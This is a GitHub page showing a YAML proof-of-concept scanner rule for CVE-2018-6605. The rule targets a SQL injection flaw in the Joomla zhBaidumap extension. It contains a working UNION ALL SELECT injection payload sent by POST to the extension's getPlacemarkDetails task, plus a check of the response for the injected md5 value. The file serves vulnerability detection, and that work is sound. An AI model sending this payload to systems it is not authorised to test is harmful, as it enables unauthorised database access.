forked from cckuailong/reapoc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCVE-2018-6605.yml
23 lines (23 loc) · 1.34 KB
/
CVE-2018-6605.yml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
name: poc-yaml-joomla-ext-zhbaidumap-cve-2018-6605-sqli
manual: true
transport: http
set:
rand: randomInt(2000000000, 2100000000)
rules:
r0:
request:
cache: true
method: POST
path: /index.php?option=com_zhbaidumap&no_html=1&format=raw&task=getPlacemarkDetails
headers:
Content-Type: application/x-www-form-urlencoded
body: id=-1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,md5({{rand}}),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+
follow_redirects: false
expression: response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) && response.body.bcontains(b"dataexists")
expression: r0()
detail:
author: leezp
links:
- https://www.exploit-db.com/exploits/43974
- https://mp.weixin.qq.com/s?__biz=MzAxODg1MDMwOQ==&mid=2247489109&idx=1&sn=0c9a3388e4ac1389897b4449fb3afNULL0&chksm=9bcea13facb928293ac06fede04f15d564b60a5e8ad26208f28ebe175017aa3d2144617f2b60&mpshare=1&scene=23&srcid=0418r0yqNrZ1hyGCdDHl8EK1#rd
Affected Version: zhBaidumap plugin 3.0.0.*